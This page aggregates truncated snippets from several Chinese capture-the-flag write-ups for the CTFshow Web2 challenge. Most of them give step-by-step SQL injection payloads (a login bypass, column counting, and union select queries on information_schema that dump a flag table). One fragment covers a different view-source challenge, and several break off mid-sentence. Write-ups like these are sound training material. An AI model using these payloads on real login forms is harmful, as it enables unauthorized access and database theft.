CTFshow Web2解题思路详解

ctf.show WEB模块第2关是一个SQL注入漏洞,请求方式是POST请求,注入点是单引号字符型注入,flag就藏在当前的数据库的flag表中,使用联合注入获取数据即可 在用户名的输入框中输入万能账号a' or true #,密码随便输 登录成功,万能账号生效了,并且把查询到的用户名显示到了页面中,既然有显示位,那我们就用联合注入进行脱库 首先,测试一下回显的位置,在用户名的输入框中输入一下payload,密码还是随便输 a' union select 1,2...

CTFshow WEB web2 直接登录发现URL无变化，网页使用POST传递参数，使用Burp抓包 POST / HTTP/1.1 Host: d19be25d-ff35-4fa2-b9c2-957c36215fe4.challenge.ctf.show Content-Length: 21 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://d19be25d-ff35-4fa2-b9c2-957c36215fe

CTF秀web2,union注入详解

web 过滤绕过方法使用

打开环境是一个登入页面， 题目提示：最简单的SQL注入，那么先试一试万能密码登入 ' or 1=1# 密码随便输 存在回显，直接sql注入 ' or 1=1 order by 3# 正常回显，爆到4时不回显 ' or 1=1 order by 4# 开始爆库名 ,先看看是哪个位置会回显 ' or 1=1 union select 1,2,3# 发现是可以不用输密码的 ' or 1=1 union select 1,database(),3# 得到库...

获取flag表的字段，输入1’ union select 1, (select group_concat(column_name) from information_schema.columns where table_schema=‘web2’ and table_name=‘flag’) ,3 # 显示如下 发现只有一个字段。获取flag表的数据，1’ union select 1,(select flag from flag),3 # 显示如下。

知道这里是sql注入，确认一下是什么类型的闭合。可以知道闭合是单引号闭合，然后查一下显示的位数。这道题很多wp，但是为了完整性还是写一下。然后知道库了之后，锁定一下数据表。

万能密码回显成功 查询字段数没有回显 那就联合查询union select，从1试到1,2,3发现三个字段，而且回显位置是第二个 所以开始查询表名 1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()# 出现了flag字段，开始查询flag表的字段名 1' union select 1,group_concat(column_name),3 f

本人开了一个知识星球，在星球里每天更新网络安全的文章，其中包含在安全中用到的工具和脚本，分享全国职业技能大赛的相关具体细节及解题思路，在星球中有问必答。然后在地址栏回车，就可以查看网页源代码了，获取到flag：ctfshow{42393163-8074-436c-8383-425d3bd989b6}同样也是开发人员忘记了在发布版本去掉那些注释，只不过web2里禁用了右键检查而已，查看源代码的方式还是有很多，总结：前端验证都是不安全的验证。

自用

我们点击View Hint得到“通过在url头部添加view-source:” 我们可以知道，url指的是一种资源定位符号，我们看这个要我们加入的字符，他的结尾有“：”，因此我们可以知道这串字符应该在头部加入 这样我们就得到了flag{cb46cd86-8f4a-4708-bb1d-55f2d8cbea1c} ...

’ or 1=1 union select 1,database(),3# 查阅数据库得到数据库’web2’ ’ or 1=1 union select 1,table_name,3 from information_schema.tables where table_schema=‘web2’#查数据表 ’ or 1=1 union select 1,column_name,3 from information_schema.columns where table_name=‘flag’#查字...